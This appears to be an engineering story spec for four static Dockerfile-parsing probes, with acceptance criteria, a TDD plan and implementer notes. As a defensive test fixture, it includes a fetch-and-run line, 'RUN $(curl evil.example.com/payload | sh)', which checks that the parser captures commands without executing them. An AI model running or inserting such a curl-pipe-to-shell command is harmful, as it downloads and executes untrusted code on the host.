Skip to content

Story S5-03 — Dockerfile + Entrypoint + ShellUsage + Certificate marker probes

Step: Step 5 — Ship Layer C (runtime + container) probes Status: Done — GREEN 2026-05-17 (commit pending) Effort: M Depends on: S5-02 (the slice schema for runtime_trace is the upstream ShellUsageProbe reads; also wires the disk-anchored raw artifact <repo>/.codegenie/context/raw/runtime_trace.json that ShellUsageProbe/CertificateProbe read via read_raw_slices per S4-01), S4-01 (read_raw_slices(raw_dir) helper at src/codegenie/output/paths.py — the only Phase-2-blessed sibling-slice access path; ctx.sibling_slices does not exist on the frozen ProbeContext), S3-03 (writer chokepoint), S1-08 (@register_probe(heaviness=, runs_last=) — does NOT accept requires=; requires is a Probe class attribute per Phase 0 localv2.md §4 + 02-ADR-0003) ADRs honored: 02-ADR-0001 (no new binary needed beyond docker/strace; these probes are file-marker driven), 02-ADR-0003 (registry-side scheduling annotations only; requires stays on the contract — @register_probe(...) accepts only heaviness + runs_last), 02-ADR-0007 (no Plugin Loader — probes are in-tree)

Validation notes

Validated: 2026-05-16 Verdict: HARDENED Findings addressed: 11 total — 4 blocks, 6 hardens, 1 nit

Changes applied: - Header Depends on: + ADRs honored: corrected — surfaced the sibling-slice mechanism (read_raw_slices from S4-01) and 02-ADR-0003's requires-is-class-attribute decision — Consistency block C1, C2 - AC for ShellUsageProbe decorator fixed — was @register_probe(...requires=[...]); corrected to class-attribute requires (matches S5-02 + S4-01 precedent and 02-ADR-0003 Option D) — Consistency block C1 - AC for EntrypointProbe.requires added — story said EntrypointProbe reads dockerfile slice but never declared requires — Consistency block C3 - AC-V1, AC-V2 added — sibling-slice access is disk-anchored via read_raw_slices(raw_dir(repo.root)) and every sibling-slice reader degrades to confidence="unavailable" when the upstream .codegenie/context/raw/<name>.json is absent (no race-induced exception) — Consistency block C4 + Coverage harden K1 - AC-V3 added — requires is metadata-only in Phase 2 (the coordinator does NOT topo-sort by it; S1-08's heaviness sort is the only ordering primitive); intra-heaviness="light" ordering between dockerfile/entrypoint/shell_usage/certificate is not guaranteed; the absence-handling discipline (AC-V2) is what makes Layer C deterministic — Consistency block C4 - AC-V4 … AC-V11 added — Dockerfile parser edge cases (line continuations, # comments, case-insensitive directives, ENTRYPOINT/CMD JSON-array vs shell-form parsing, ENV/LABEL multi-pair on one line, HEALTHCHECK NONE vs HEALTHCHECK CMD, Containerfile synonym, COPY --from=<missing-stage> typed signal, ARG directive captured) — Coverage harden K2–K7 - Test 7 reworded as parametrized per-directive + property-based round-trip Test 15 added (Hypothesis-driven parser stability) — Test-Quality harden T1, T2 - Mutation-suite test (Test 16) added — a deliberately weakened parser (skip-RUN, lowercase-only directive table, eager ${VAR} expansion) must fail at least one named test — Test-Quality harden T3 - LOC budget AC tightened — was "≤ 100 LOC excluding docstrings; raw < 150 with 50-line slack"; replaced with a clean per-module non-blank non-comment line ceiling (cloc or equivalent), no slack — Test-Quality nit N1 - Static-evidence schema tightened to typed Pydantic models (StaticShellEvidence + RunCommandEntry) — Design-Patterns harden D1 - Notes for the implementer — added two paragraphs: (a) reuse the read_raw_slices helper from S4-01 (rule-of-three: B2 + ShellUsage + Entrypoint + Certificate; the helper IS the kernel — no per-probe disk-IO duplication); (b) tagged-union Directive sum type opportunity for _tokenize_dockerfile_line (exhaustive match + assert_never = Open/Closed via the compiler) — promoted from nit to a documented opportunity, not an AC, per Rule 2 (only the _tokenize_dockerfile_line extract is mandated; the discriminated-union form is the implementer's call within the LOC budget) — Design-Patterns harden D2, D3

Conflict resolutions: - Design-Patterns initially proposed mandating a Directive tagged-union sum type as an AC. Demoted to Notes for the implementer per Rule 2 (Simplicity First) — the LOC budget is the harder constraint and one of the two shapes (tuple[Literal[...], dict] vs Directive = FromDirective | RunDirective | …) is fine. - Coverage proposed an AC asserting "two concurrent gathers of the same repo produce byte-identical Layer C slices". Resolved against — Phase 2 doesn't pin Layer C race semantics globally; AC-V2 (graceful absent-upstream) is the per-probe contract; the cross-probe coordinator-race is S7-04 (Phase 5) territory, not S5-03.

Full audit log: docs/phases/02-context-gather-layers-b-g/stories/_validation/S5-03-layer-c-marker-probes.md

Context

The remaining Layer C probes (localv2.md §5.3 C1, C5–C7) are marker-and-parse — each reads Dockerfile (and possibly the runtime_trace slice) and emits a typed slice. None of them invokes a subprocess; none of them needs an ALLOWED_BINARIES addition; each is ≤ 80–100 LOC. They depend on S5-02 only because ShellUsageProbe reads RuntimeTraceProbe's shell_invocations count (the "shell usage" classification combines static Dockerfile evidence with the runtime trace's dynamic evidence — localv2.md §5.3 C5).

The Dockerfile parser is line-by-line with no shell evaluation. We do not run RUN commands; we do not expand ${VAR}; we do not call out to BuildKit's parser. The shape we emit (FROM chain, USER, EXPOSE, HEALTHCHECK, CMD/ENTRYPOINT literals) is what Phase 3's distroless planner reads — sufficient for the planner without inheriting the supply-chain attack surface of a real Dockerfile evaluator. localv2.md §5.3 C1 names the dockerfile Python library as the reference; we adopt it only if it can be vendored without shell evaluation. If not, the parser is a hand-rolled state machine over the line forms named in localv2.md §5.3 C1.

References

Goal

Land four marker-and-parse probes under src/codegenie/probes/layer_c/: dockerfile.py, entrypoint.py, shell_usage.py, certificate.py. Each is ≤ 100 LOC, each ships with happy-path + marker-absent unit tests, each has a sub-schema under src/codegenie/schema/probes/layer_c/<probe>.schema.json with additionalProperties: false. The Dockerfile parser is line-by-line, no shell evaluation, no RUN execution.

Acceptance criteria

  • [ ] src/codegenie/probes/layer_c/dockerfile.py exists; @register_probe(heaviness="light"); emits the slice shape from localv2.md §5.3 C1.
  • [ ] dockerfile.py parser is line-by-line, no shell evaluation — a unit test asserts that a Dockerfile with RUN $(curl evil.example.com/payload | sh) produces a slice carrying the literal string in run_commands[].command (not evaluated, not expanded, no network call). A grep test asserts the module source contains zero subprocess, zero os.system, zero eval, zero exec() calls.
  • [ ] dockerfile.py captures: FROM chain (all stages); USER directive per stage; EXPOSE literals; HEALTHCHECK literal capture (the full directive line); CMD and ENTRYPOINT literals (exec vs shell form distinguished); WORKDIR; ENV key/value pairs; LABEL key/value pairs; COPY --from=<stage> directives.
  • [ ] Multi-stage support: a Dockerfile with FROM build AS builder then FROM build:final emits stages with the right inherits_from links. Unit test covers a 2-stage and a 3-stage fixture.
  • [ ] Marker absent: a repo with no Dockerfile (and no containerfile/Containerfile) emits confidence="unavailable" and dockerfiles: []; no exception raised.
  • [ ] Multi-Dockerfile support: a repo with Dockerfile + Dockerfile.dev + apps/api/Dockerfile emits dockerfiles: [<three entries>]; the slice's dockerfiles[].path is repo-root-relative.
  • [ ] src/codegenie/probes/layer_c/entrypoint.py exists; @register_probe(heaviness="light") (decorator does NOT accept requires= per 02-ADR-0003); the class declares requires: list[str] = ["dockerfile"] as a Probe class attribute. Reads the dockerfile slice's dockerfiles[].entrypoint field from disk via read_raw_slices(raw_dir(repo.root)); classifies as exec-form vs shell-form; emits a probe-level summary (one final-stage entrypoint per Dockerfile). (validator: hardened — Consistency C1, C3.)
  • [ ] entrypoint.py marker-absent path: no Dockerfile → confidence="unavailable"; Dockerfile with no ENTRYPOINT and no CMDconfidence="low" + form="absent".
  • [ ] src/codegenie/probes/layer_c/shell_usage.py exists; @register_probe(heaviness="light") (decorator accepts only heaviness + runs_last per 02-ADR-0003 — do NOT pass requires=); the class declares requires: list[str] = ["dockerfile", "runtime_trace"] as a Probe class attribute per Phase 0 localv2.md §4 and the precedent set by S5-02 (RuntimeTraceProbe.requires == []) and S4-01 (IndexHealthProbe.requires == []). Reads the dockerfile slice and the runtime_trace slice from disk via read_raw_slices(raw_dir(repo.root)) (the helper S4-01 introduced — ctx.sibling_slices does NOT exist on the frozen ProbeContext). Emits static evidence only for Phase 2 (the dynamic-evidence-and-replacement-catalog flow is deferred — see "Out of scope"). Static evidence (typed via Pydantic StaticShellEvidence model): final_stage_entrypoint_form, final_stage_cmd_form, final_stage_run_commands: list[RunCommandEntry] (build_time vs runtime classification based on stage). (validator: hardened — Consistency C1 + Design-Patterns D1.)
  • [ ] shell_usage.py reads runtime_trace.shell_invocations and emits dynamic_shell_invocation_count: int | NoneNone when runtime_trace.confidence == "unavailable"; the integer otherwise.
  • [ ] src/codegenie/probes/layer_c/certificate.py exists; @register_probe(heaviness="light") (decorator does not accept requires= per 02-ADR-0003); the class declares requires: list[str] = ["runtime_trace"] as a Probe class attribute. Reads runtime_trace.cert_paths_read from disk via read_raw_slices(raw_dir(repo.root)) (S4-01 helper; ctx.sibling_slices does NOT exist). Emits the list + a typed certificate_source: Literal["ca-certificates", "vendored", "absent", "unknown"] classification derived from the path prefixes (/etc/ssl/certs/ca-certificates.crt"ca-certificates"; /app/vendor/certs/ prefix → "vendored"; empty list → "absent"). (validator: hardened — Consistency C1.)
  • [ ] Every probe has a sub-schema under src/codegenie/schema/probes/layer_c/<name>.schema.json with additionalProperties: false at the root and at every nested object (Phase 1 ADR-0004 convention). A sub-schema rejection test per probe presents a slice with one extra field and asserts validation rejects it.
  • [ ] All four probes' slices flow through the writer chokepoint as RedactedSlice (S3-03).
  • [ ] mypy --strict clean.
  • [ ] Each module is ≤ 100 LOC (excluding docstrings + imports); enforce via wc -l smoke test that asserts < 150 raw lines (allow 50-line slack for docstrings). Superseded by AC-V12 below — keep this bullet for diff continuity; AC-V12 is the binding contract.
  • [ ] forbidden-patterns stays green — no model_construct; no subprocess; no eval/exec.
  • [ ] AC-V1 (sibling-slice disk-anchored access). ShellUsageProbe, EntrypointProbe, and CertificateProbe read upstream slice data only from <repo>/.codegenie/context/raw/<name>.json via the read_raw_slices(raw_dir(repo.root)) helper that S4-01 introduced at src/codegenie/output/paths.py (or its equivalent module path; the executor MUST reuse this helper, not re-implement disk IO). Verified by a structural test that imports each of the three probe modules and asserts (a) read_raw_slices is the only inbound import from codegenie.output.paths and (b) zero usages of ctx.sibling_slices (which doesn't exist on the frozen ProbeContext — failure mode caught: a future contributor inventing a phantom field). (validator: added — Consistency C4 + Design-Patterns D2; rule-of-three: B2 + 3 Layer-C readers = 4th, kernel reuse mandatory.)
  • [ ] AC-V2 (upstream-slice absent → typed confidence="unavailable", never raises). Each sibling-slice reader (ShellUsageProbe, EntrypointProbe, CertificateProbe) emits confidence="unavailable" with an empty/null payload when its declared upstream raw artifact is absent from disk at run() time (e.g., <repo>/.codegenie/context/raw/dockerfile.json not yet written). The probe MUST NOT raise. Verified per probe by a unit test that runs the probe against a fixture where the upstream raw artifact is intentionally missing; assert the typed-error path (no traceback, no exception type leaks into the slice). Mirrors IndexHealthProbe.IndexerError("upstream_<name>_unavailable") discipline (phase-arch-design.md §"Component design" #1). (validator: added — Consistency C4 + Coverage K1; race-safety guarantee.)
  • [ ] AC-V3 (requires is metadata-only in Phase 2). A documentation-level assertion in each module's docstring (and an audit test that greps for the docstring text) records: "The Phase 2 coordinator does NOT topologically sort by requires (02-ADR-0003 Option D adopted; requires is the contract-side documentation channel only). Dispatch order within heaviness=\"light\" is concurrent under the single asyncio.Semaphore. AC-V2's graceful-absent-upstream behavior is what makes this probe correct under arbitrary scheduling." Verified by a test that greps each of the three module sources for the literal substring requires is metadata-only. (validator: added — Consistency C4; makes the load-bearing scheduling invariant grep-able for the next contributor.)
  • [ ] AC-V4 (# comments + line continuations). The Dockerfile parser ignores leading-# comment lines (excluding # syntax=... directive which is captured separately as parser_directive) and concatenates \-continued physical lines into a single logical directive before tokenization. Unit tests: (a) fixture with # comments inside RUN blocks; (b) fixture with RUN apt-get update \\\n && apt-get install -y foo — assert the captured run_commands[0].command contains both halves; (c) fixture with # syntax=docker/dockerfile:1.4 first line — assert it appears as parser_directive and is NOT counted as a FROM predecessor. (validator: added — Coverage K2.)
  • [ ] AC-V5 (case-insensitive directives). The parser accepts directives in any case (FROM, from, From) per Docker's reference. Parametrized unit test: same fixture content with FROM/from/From produces identical slices. (validator: added — Coverage K3.)
  • [ ] AC-V6 (ENTRYPOINT/CMD JSON-array vs shell-form distinguished). Parser distinguishes the two forms: ENTRYPOINT ["sh", "-c", "echo hi"]form="exec", argv=["sh","-c","echo hi"]; ENTRYPOINT echo hiform="shell", command="echo hi". Same for CMD. Unit tests cover both forms for each directive, plus a malformed JSON array (ENTRYPOINT ["sh", "-c") → typed signal form="malformed" + the literal capture preserved (parser does not silently coerce). (validator: added — Coverage K4.)
  • [ ] AC-V7 (ENV/LABEL multi-pair on one line). Parser handles ENV A=1 B=2 C=3env: {A: "1", B: "2", C: "3"} and the equivalent for LABEL; also handles the legacy single-pair-no-equals form ENV A 1 (per Docker reference, deprecated but legal). Unit tests cover both. Multi-line continuation with \\ is tokenized first (per AC-V4) so multi-pair on the resulting joined line works the same. (validator: added — Coverage K5.)
  • [ ] AC-V8 (HEALTHCHECK NONE vs HEALTHCHECK CMD). Parser distinguishes the two forms: HEALTHCHECK NONEhealthcheck: {kind: "none"}; HEALTHCHECK --interval=30s CMD curl -f http://...healthcheck: {kind: "cmd", options: {interval: "30s"}, cmd: "curl -f http://..."}. Unit tests cover both. (validator: added — Coverage K6.)
  • [ ] AC-V9 (Containerfile synonym positive test). A fixture repo with Containerfile (no Dockerfile) is parsed identically to one with Dockerfile; the slice's dockerfiles[0].path equals Containerfile (preserved literally, repo-root-relative). Story already names this synonym in the marker-absent AC; AC-V9 adds the positive test. (validator: added — Coverage K7.)
  • [ ] AC-V10 (COPY --from=<missing-stage> typed signal). When COPY --from=builder references a stage name builder that was never declared (no FROM ... AS builder), the slice captures the directive literally AND emits a typed structural flag copy_directives[i].from_stage_resolved: bool = False. Resolved cross-stage references set the flag True. Unit test covers both. Rationale: Phase 3's distroless planner reads this signal to surface a parse-time inconsistency without re-implementing the resolution. (validator: added — Coverage K8.)
  • [ ] AC-V11 (ARG directive captured). ARG directives (ARG NODE_VERSION=20, ARG NODE_VERSION without default) are captured per stage in args: list[ArgDirective] with name, default: str | None, and before_first_from: bool (the special "global ARG" case Docker uses for parameterizing FROM). Unit test covers both forms + a global ARG preceding FROM ${NODE_VERSION}-alpine — assert the global ARG is recorded and the ${NODE_VERSION} reference in FROM is captured literally (no expansion). (validator: added — Coverage K9; closes the Implementation-outline-named-but-AC-missing gap.)
  • [ ] AC-V12 (LOC budget — clean, no slack). Each of the four modules has ≤ 100 source lines, counted by cloc (or equivalent: lines that are not blank and not comment-only). Docstrings count as comments and are excluded; imports count as source. No "raw < 150 with 50-line slack" — the budget is the budget. Smoke test calls cloc --json src/codegenie/probes/layer_c/<name>.py and asserts the code count ≤ 100 per file. (validator: hardened — replaced the loose smoke; Test-Quality N1.)

Implementation outline

  1. dockerfile.py — hand-roll a line-by-line parser. Tokenize each line by leading directive (FROM, RUN, COPY, USER, EXPOSE, HEALTHCHECK, CMD, ENTRYPOINT, WORKDIR, ENV, LABEL, ARG, ONBUILD, STOPSIGNAL, SHELL, VOLUME, MAINTAINER (deprecated, captured anyway)). Pydantic model DockerfileSlice with dockerfiles: list[ParsedDockerfile]. Multi-line RUN with \ continuation is concatenated (preserve \n markers in the captured string so a downstream reader can split). Never evaluate — capture literal strings only.
  2. entrypoint.py — reads dockerfile slice from disk via read_raw_slices(raw_dir(repo.root)) (the S4-01 helper; ctx.sibling_slices does NOT exist); classification logic is pure. The disk read is the only I/O. Class attribute requires: list[str] = ["dockerfile"] is metadata-only (02-ADR-0003 — coordinator does not topo-sort by it); AC-V2's absent-upstream handling is what makes correctness independent of dispatch order.
  3. shell_usage.py — reads dockerfile + runtime_trace slices from disk via read_raw_slices(...) (same helper). Static classification (final-stage RUN commands typed as RunCommandEntry, entrypoint form). Class attribute requires: list[str] = ["dockerfile", "runtime_trace"] is metadata-only. The replacement catalog (localv2.md §5.3 C5) is deferred — emit static evidence only, typed via StaticShellEvidence Pydantic model (extra="forbid", frozen=True).
  4. certificate.py — reads runtime_trace.cert_paths_read from disk via read_raw_slices(...); classification by path prefix. Class attribute requires: list[str] = ["runtime_trace"] is metadata-only.
  5. Sub-schemas — four <name>.schema.json files under src/codegenie/schema/probes/layer_c/; each with additionalProperties: false at every object node; each referenced by src/codegenie/schema/repo-context.schema.json oneOf / properties (incremental — match how S4-07 wired Layer B sub-schemas).
  6. Tests — happy-path + marker-absent + sub-schema rejection per probe.

TDD plan — red / green / refactor

Red:

  1. test_dockerfile_probe_register_light — registry introspection asserts heaviness == "light".
  2. test_dockerfile_parser_no_shell_evaluation — feed a fixture Dockerfile containing RUN $(curl evil.example.com | sh); assert the slice's run_commands[0].command == "$(curl evil.example.com | sh)" literally; assert no network call (mock-spy on socket import — already banned by fence).
  3. test_dockerfile_parser_no_subprocess_in_source — grep the source: zero subprocess, zero os.system, zero eval(, zero exec(.
  4. test_dockerfile_multi_stage_2 and test_dockerfile_multi_stage_3 — fixture Dockerfiles with 2 and 3 stages; assert stage names, inherits_from, base images extracted correctly.
  5. test_dockerfile_marker_absent — repo snapshot with no Dockerfile; assert confidence="unavailable", dockerfiles == [].
  6. test_dockerfile_multiple_files — fixture with Dockerfile, Dockerfile.dev, apps/api/Dockerfile; assert three entries with repo-root-relative paths.
  7. test_dockerfile_directive_coverageparametrized per directive (FROM, RUN, COPY, ADD, USER, EXPOSE, HEALTHCHECK, CMD, ENTRYPOINT, WORKDIR, ENV, LABEL, ARG, ONBUILD, STOPSIGNAL, SHELL, VOLUME, MAINTAINER): each parametrization feeds the smallest fixture exercising that directive and asserts (a) the captured field on the slice matches the expected value (b) every other captured field is at its empty/default state (no spurious capture). Mutation-resistance: a parser that returns the same dict for every directive would fail every parametrization except one. (validator: hardened from "single fixture with one of each" — failure was localised when one of 18 directives broke; Test-Quality T1.)
  8. test_entrypoint_probe_exec_form and test_entrypoint_probe_shell_form — table-driven over ["sh", "-c", "echo hi"] vs "echo hi".
  9. test_entrypoint_absent — Dockerfile with no ENTRYPOINT / CMDform="absent", confidence="low".
  10. test_shell_usage_static_only — feed fixture dockerfile slice + runtime_trace slice; assert final_stage_run_commands reflects only RUN lines from the final stage; build_time vs runtime classification matches.
  11. test_shell_usage_dynamic_count_when_runtime_trace_unavailableruntime_trace.confidence == "unavailable"dynamic_shell_invocation_count is None.
  12. test_shell_usage_dynamic_count_presentruntime_trace.shell_invocations == 3dynamic_shell_invocation_count == 3.
  13. test_certificate_classification — table over path-prefix → classification: /etc/ssl/certs/ca-certificates.crt"ca-certificates"; /app/vendor/certs/*"vendored"; []"absent"; novel path → "unknown".
  14. Per-probe sub-schema rejection: present a slice JSON with one extra field; assert jsonschema.validate raises.
  15. test_dockerfile_parser_property_roundtrip (property-based via hypothesis). Generate arbitrary syntactically-valid Dockerfile fixtures from a Hypothesis grammar (one stage, then multi-stage; pick from the 18 known directives; randomize arg shape, quoting, line continuations, case, comment interleaving). For each generated input, assert the invariant set: (a) parse(text) does not raise; (b) every captured directive appears in the input text (capture-soundness); (c) re-rendering the slice into a canonical Dockerfile form parses to a slice structurally equal to the original (round-trip identity, modulo whitespace); (d) zero shell evaluation evidence (no socket import touched, no subprocess spawned — pytest-subprocess sentinel). Shrinker localises any off-by-one tokenization bug to a minimal counter-example. (validator: added — Test-Quality T2; property-based discipline mirrors S1-08's AC-15 hypothesis test.)
  16. test_dockerfile_parser_mutation_resistance (mutation suite). A @pytest.mark.parametrize table of three intentionally-broken parser stubs lives in the test module: (a) _skip_run_directive — same parser but never captures RUN; (b) _lowercase_only_directive_table — same parser but only matches lowercase directives; (c) _eager_var_expansion — same parser but substitutes ${VAR} from os.environ. For each stub, assert that at least one of the named tests in this module FAILS when the production parser is monkey-patched to the stub (use pytest's request.node.session.testscollected indirection or simply call the stubbed parser inline and assert at-least-one named assertion would fail). This is the structural defense — guarantees the test suite is mutation-strong, not happy-path-only. (validator: added — Test-Quality T3; mirrors the SecretRedactor mutation-test discipline at phase-arch-design.md §"Component design" #4 last bullet.)
  17. test_sibling_slice_absent_unavailable (per probe — three parametrizations: ShellUsageProbe, EntrypointProbe, CertificateProbe). Run each probe against a fixture where the named upstream raw artifact is intentionally absent from <repo>/.codegenie/context/raw/. Assert slice.confidence == "unavailable", the slice payload is the typed empty form (not a partial fill), and no exception propagates (use pytest.raises(...) inverse — a try/except wrapper that fails the test if any exception escapes). (validator: added — AC-V2 verification; race-safety.)
  18. test_requires_metadata_only_docstring_present (per probe — three parametrizations). Each of shell_usage.py, entrypoint.py, certificate.py source contains the literal substring requires is metadata-only somewhere in the module docstring. Failure mode caught: future contributor deletes the note and silently assumes topo-sort enforcement exists. (validator: added — AC-V3 verification.)
  19. test_sibling_slice_reader_is_read_raw_slices (per probe — three parametrizations). AST-walk each of the three reader modules and assert (a) exactly one import of read_raw_slices from codegenie.output.paths (or the canonical location S4-01 wired), (b) zero references to a ctx.sibling_slices attribute (regex on source — ctx\.sibling_slices must not match), (c) zero direct Path(...).read_text() / open() calls reading from .codegenie/context/raw/ (the helper is the only sanctioned path). (validator: added — AC-V1 verification + Design-Patterns D2 kernel-reuse enforcement.)
  20. Edge-case parser tests (cover AC-V4 → AC-V11). Eight named tests, one per added AC: test_dockerfile_comments_and_continuations, test_dockerfile_case_insensitive_directives, test_dockerfile_entrypoint_exec_vs_shell_form, test_dockerfile_env_multipair, test_dockerfile_label_multipair_and_quoted, test_dockerfile_healthcheck_none_vs_cmd, test_dockerfile_containerfile_synonym_parses, test_dockerfile_copy_from_missing_stage_typed_signal, test_dockerfile_arg_directive_captured_global_and_per_stage. (validator: added — Coverage K2–K9 verification.)
  21. test_loc_budget_per_module (smoke). For each of the four modules, invoke cloc --json (or, if cloc is not on PATH in CI, a Python-native equivalent that strips blank lines, comment-only lines, and docstring blocks) and assert the code count ≤ 100. Per-module, no slack. (validator: added — AC-V12 verification; Test-Quality N1.)

Green:

  1. Implement the four parsers + the four sub-schemas.
  2. Declare requires as a class attribute on ShellUsageProbe, EntrypointProbe, and CertificateProbe (the Phase 0 Probe ABC defines requires: list[str] as a class field per localv2.md §4; S5-02 set the precedent with requires: list[str] = []). Do NOT pass requires= to @register_probe(...) — per 02-ADR-0003 the decorator accepts only heaviness + runs_last. requires is metadata; correctness comes from AC-V2 (graceful absent-upstream), not from coordinator topo-sort.
  3. Reuse read_raw_slices(raw_dir(repo.root)) from S4-01 for all sibling-slice access. Do not duplicate disk IO in any of the three probes.
  4. Make all red tests pass.

Refactor:

  1. Extract Dockerfile-line tokenization into _tokenize_dockerfile_line(line: str) -> Directive | None — pure, table-driven, easily unit-testable.
  2. Confirm each module is ≤ 100 LOC (excluding docstrings); refactor if not.
  3. Each probe's run() is a 10–20-line wrapper around the pure parser/classifier — keep the I/O thin.

Files to touch

  • New: src/codegenie/probes/layer_c/dockerfile.py, src/codegenie/probes/layer_c/entrypoint.py, src/codegenie/probes/layer_c/shell_usage.py, src/codegenie/probes/layer_c/certificate.py.
  • New schemas: src/codegenie/schema/probes/layer_c/{dockerfile,entrypoint,shell_usage,certificate}.schema.json.
  • New tests: tests/unit/probes/layer_c/{test_dockerfile.py,test_entrypoint.py,test_shell_usage.py,test_certificate.py}.
  • New fixtures: tests/fixtures/dockerfiles/{single_stage,two_stage,three_stage,no_dockerfile,evil_run_command,multi_dockerfile}/....
  • Possibly extend: src/codegenie/schema/repo-context.schema.json — wire the four sub-schemas (mirror how S4-07 wired Layer B).

Out of scope

  • The replacement catalog (localv2.md §5.3 C5 — the YAML-driven shell-replacement classifier) — defer to Phase 3 / Phase 7 when the distroless planner consumes it; this probe emits static evidence only.
  • Falling back to BuildKit's buildctl debug dump-llb (localv2.md §5.3 C1 fallback) — explicitly not in Phase 2 (would require buildctl in ALLOWED_BINARIES, no ADR). If the hand-rolled parser proves insufficient on the portfolio fixtures, surface as an ADR-amend candidate in Phase 3.
  • secrets in Dockerfile detection (COPY --chown=...:... secrets.json /app) — gitleaks (S6-07) catches secrets at the file level; this probe surfaces the COPY directive literally and lets gitleaks do its job.
  • The runtime_trace sub-schema — landed by S5-02 / S5-04 (this story validates the slice shape only as a downstream reader).
  • SBOMProbe / CVEProbeS5-04.

Notes for the implementer

  • requires is a class attribute, not a @register_probe kwarg — and it is metadata-only in Phase 2. Two precedents to follow:
  • 02-ADR-0003 picked Option D: @register_probe(...) accepts only heaviness + runs_last. The requires: list[str] field is on the Probe ABC (localv2.md §4, frozen). Passing requires= to the decorator will either be a TypeError or — worse — silently accepted by a permissive **kwargs and dropped on the floor.
  • S5-02 set the precedent: class RuntimeTraceProbe(Probe): requires: list[str] = []. S4-01 validation (_validation/S4-01-index-health-probe.md) explicitly catalogued the equivalent phantom in IndexHealthProbe and forced the fix; this story carries the precedent forward.

The coordinator does NOT topologically sort by requires (rejected as Option C in 02-ADR-0003 — "lies about dependencies"). Dispatch order within heaviness="light" is concurrent under the single asyncio.Semaphore. AC-V2 is what makes Layer C correct: each sibling-slice reader degrades to confidence="unavailable" when the upstream raw artifact isn't yet on disk. Do NOT propose a coordinator-side topo-sort in this story; that's a separate ADR conversation. Do NOT propose adding requires to @register_probe's signature; that's a re-litigation of 02-ADR-0003.

  • Sibling-slice access is disk-anchored — reuse the S4-01 helper. ProbeContext is contract-frozen (Phase 0 ADR-0007). It does not carry sibling_slices. The only Phase-2-blessed path to read a sibling's slice is read_raw_slices(raw_dir(repo.root)) at src/codegenie/output/paths.py (or the canonical location S4-01 wired). With B2 (S4-01) + ShellUsageProbe + EntrypointProbe + CertificateProbe, this is now the 4th consumer of read_raw_slices — the rule-of-three threshold is well past, the helper IS the kernel. Do not re-implement disk IO in any of the three Layer C readers. AC-V1 + Test 19 (AST audit) is the structural enforcement.

  • Directive tagged-union opportunity (optional — implementer's call, not an AC). The Dockerfile _tokenize_dockerfile_line(line: str) -> Directive | None helper is a natural home for a tagged-union sum type:

    Directive = FromDirective | RunDirective | CopyDirective | UserDirective | ExposeDirective \
              | HealthcheckDirective | CmdDirective | EntrypointDirective | WorkdirDirective \
              | EnvDirective | LabelDirective | ArgDirective | OnbuildDirective \
              | StopsignalDirective | ShellDirective | VolumeDirective | MaintainerDirective \
              | AddDirective
    
    Each variant is a frozen Pydantic model with a Literal["..."] discriminator on kind. The parser dispatch becomes a match directive: case FromDirective(): ... case _: assert_never(directive) — exhaustive checking via the compiler / mypy --warn-unreachable. This is make illegal states unrepresentable + Open/Closed via match exhaustiveness (adding a new directive forces a match arm). Trade-off: ≥ 18 small model definitions add ~30–50 LOC just for the types. The LOC budget is AC-V12 (≤ 100 source lines per module). If you can fit the sum-type version under budget (likely by moving the directive models into a sibling module src/codegenie/probes/layer_c/_dockerfile_directives.py not counted against dockerfile.py's budget), prefer it — the structural enforcement is worth it. If not, a tuple[Literal["FROM", "RUN", ...], dict[str, str]] is acceptable and the parser keeps the exhaustive match on kind. The validator does not mandate the sum-type form; the only mandate is the _tokenize_dockerfile_line extract (Refactor step 1).

  • Original "requires mechanism" note retained context (deprecated). The earlier version of this story said "S5-04 introduces the requires mechanism if not already in S1-08 — surface in Notes for the implementer." That framing is incorrect — see the first bullet above. S5-04 will hit the same Consistency block at its own validation pass and resolve the same way (class-attribute, metadata-only, AC-V2-style absent-upstream handling).

  • localv2.md §5.3 C1 names dockerfile (the Python library) as the parser of choice. Evaluate it: if it ships with shell evaluation enabled by default (or imports anything from subprocess), we cannot adopt it. Hand-rolled parser is the safe fallback — Dockerfile's surface is small (~20 directives), and the test corpus covers the shapes Phase 3 will need. Decision criterion: zero shell evaluation, zero subprocess imports. If the vendored library passes the audit, prefer it; otherwise hand-roll. Document the decision in the module docstring.
  • secrets in Dockerfile path: a RUN command containing AWS_SECRET_ACCESS_KEY=AKIA… flows through the writer chokepoint and is redacted via S3-01's SecretRedactor. The dockerfile parser does not filter; it captures the literal, the writer redacts. This is the same chokepoint discipline Layer G scanners use.
  • requires ordering vs cache. If RuntimeTraceProbe cache-HITs (per S5-02), the downstream probes (ShellUsageProbe, CertificateProbe) still need the cached slice's content. The coordinator's slice-map (Phase 0) carries cached output to dependent probes; no special handling here.
  • Multi-Dockerfile semantics. Some repos have Dockerfile for production + Dockerfile.dev for development + per-app Dockerfiles under apps/<service>/Dockerfile. We emit all of them; RuntimeTraceProbe (S5-02) traces only one (the canonical Dockerfile at repo root, configurable via .codegenie/scenarios.yaml in a future ADR). Phase 3's planner reads the parsed list and picks which one to migrate.
  • shell_usage.py replacement catalog deferral. The catalog (localv2.md §5.3 C5) is the kind of org-uniqueness data that lives under ~/.codegenie/replacement-catalogs/ and is loaded by a Phase 3 / Phase 7 loader — not Phase 2. The CLAUDE.md commitment "organizational uniqueness as data, not prompts" applies here: Phase 2 emits the evidence; Phase 3+ owns the catalog. Resist landing a catalog loader here even if the YAML format is obvious.
  • certificate_source classification table. Keep it small (4 buckets). If the portfolio surfaces a fifth pattern, extend via ADR-amend (small, additive).
  • additionalProperties: false is non-negotiable per Phase 1 ADR-0004; the rejection test per probe is the structural enforcement.
  • mypy --warn-unreachable — these four modules are simple enough that an exhaustive match isn't load-bearing; the S1-11 per-module override list need not include them. If a match on a discriminated union shows up (e.g., on certificate_source's Literal), add the override.
  • LOC budget. ≤ 100 LOC per probe is the design discipline. If you find yourself over 120 LOC, the parser has too much logic — extract pure helpers and keep the run() method thin (10–20 LOC).